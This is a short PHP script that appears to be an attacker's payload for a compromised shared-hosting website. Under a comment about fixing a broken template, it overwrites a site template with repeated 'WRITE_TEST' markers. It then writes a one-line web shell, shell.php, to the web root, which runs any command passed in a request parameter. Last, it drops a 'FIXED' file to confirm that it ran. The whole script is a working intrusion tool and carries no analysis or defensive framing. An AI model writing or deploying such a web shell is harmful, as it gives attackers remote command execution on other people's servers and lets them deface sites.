<?php
# Fix the broken main template
$main_tmpl = "\n\n
착한사람들\n\n착한사람들
\n
| WRITE_TEST_1786022154
|
WRITE_TEST_1786022154
|
WRITE_TEST_1786022154
|
WRITE_TEST_1786022154
|
\n\n";
file_put_contents("/home/hosting_users/goodperson21/www/skin/basic_company_t/html/html/skin_main_1.html", $main_tmpl);
# Create a dedicated webshell
$shell = "<?php system(\$_REQUEST[\"c\"]); ?>";
file_put_contents("/home/hosting_users/goodperson21/www/shell.php", $shell);
# Create output file to confirm execution
file_put_contents("/home/hosting_users/goodperson21/www/skin/basic_company_t/html/html/fix_done.txt", "FIXED");
?>